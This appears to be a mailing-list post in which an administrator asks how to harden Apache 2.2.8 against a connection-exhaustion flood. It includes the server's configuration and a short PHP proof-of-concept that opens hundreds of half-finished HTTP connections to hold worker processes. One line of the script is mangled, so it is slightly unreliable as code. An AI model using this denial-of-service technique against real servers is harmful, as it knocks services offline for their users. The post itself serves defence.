Hello,
One of my servers was affected by TCP flood attack targeted to http service
(Apache 2.2.8). Short attack description: an attacker opens large amount of
TCP connections to Apache service and sends few bytes (for example, a single
"GET / HTTP/1.1" line) to every opened connection. The HTTP service opens a
new process for every such connection and waits for further input. After a
short time, HTTPd runs out of connection limit and stops responding.
Some of my servers are protected by state tracking firewall that protects
them against such kind of attack.
My question: is there possible to configure Apache HTTPd in order to protect
it against these attacks?
Thank you in advance.
############################################################################
#########
Here is the simple PHP script that demonstrates the attack:
<?php
/**
* Proof of concept script: TCP connection flooding
* THIS SCRIPT WAS WRITTEN FOR INTERNAL TEST PURPOSES ONLY!!!
*/
// "Victim" server IP address or domain name
$target_host='192.168.2.222';
// TCP port (normally, 80)
$target_port=25;
$conn=array();
for ($i=0; $i<500; $i++) {
if ($conn[$...@fsockopen($target_host, $target_port)) {
echo "Connection #$i opened\n";
flush();
fwrite($conn[$i], "GET / HTTP/1.1\r\n"); // lets send the first line and
grab an apache process
}
}
sleep(30); // The server must be blocked until the script exits
?>
############################################################################
#########
Here is some local Apache data:
# /usr/sbin/apache2ctl -V
Server version: Apache/2.2.8 (Ubuntu)
Server built: Mar 10 2009 18:09:51
Server's Module Magic Number: 20051115:11
Server loaded: APR 1.2.11, APR-Util 1.2.12
Compiled using: APR 1.2.11, APR-Util 1.2.12
Architecture: 64-bit
Server MPM: Prefork
threaded: no
forked: yes (variable process count)
Server compiled with....
-D APACHE_MPM_DIR="server/mpm/prefork"
-D APR_HAS_SENDFILE
-D APR_HAS_MMAP
-D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
-D APR_USE_SYSVSEM_SERIALIZE
-D APR_USE_PTHREAD_SERIALIZE
-D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
-D APR_HAS_OTHER_CHILD
-D AP_HAVE_RELIABLE_PIPED_LOGS
-D DYNAMIC_MODULE_LIMIT=128
-D HTTPD_ROOT=""
-D SUEXEC_BIN="/usr/lib/apache2/suexec"
-D DEFAULT_PIDLOG="/var/run/apache2.pid"
-D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
-D DEFAULT_LOCKFILE="/var/run/apache2/accept.lock"
-D DEFAULT_ERRORLOG="logs/error_log"
-D AP_TYPES_CONFIG_FILE="/etc/apache2/mime.types"
-D SERVER_CONFIG_FILE="/etc/apache2/apache2.conf"
############################################################################
#########
# cat apache2.conf |egrep "^[a-zA-Z0-9 \t<].*"
ServerRoot "/etc/apache2"
LockFile /var/lock/apache2/accept.lock
PidFile ${APACHE_PID_FILE}
Timeout 15
KeepAlive Off
MaxKeepAliveRequests 100
KeepAliveTimeout 10
<IfModule mpm_prefork_module>
StartServers 5
MinSpareServers 5
MaxSpareServers 10
MaxClients 100
MaxRequestsPerChild 0
</IfModule>
<IfModule mpm_worker_module>
StartServers 2
MaxClients 100
MinSpareThreads 25
MaxSpareThreads 50
ThreadsPerChild 25
MaxRequestsPerChild 0
</IfModule>
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
AccessFileName .htaccess
<Files ~ "^\.ht">
Order allow,deny
Deny from all
</Files>
DefaultType text/plain
HostnameLookups Off
ErrorLog /var/log/apache2/error.log
LogLevel warn
Include /etc/apache2/mods-enabled/*.load
Include /etc/apache2/mods-enabled/*.conf
Include /etc/apache2/httpd.conf
Include /etc/apache2/ports.conf
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\""
combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
ServerTokens Prod
ServerSignature Off
Include /etc/apache2/conf.d/
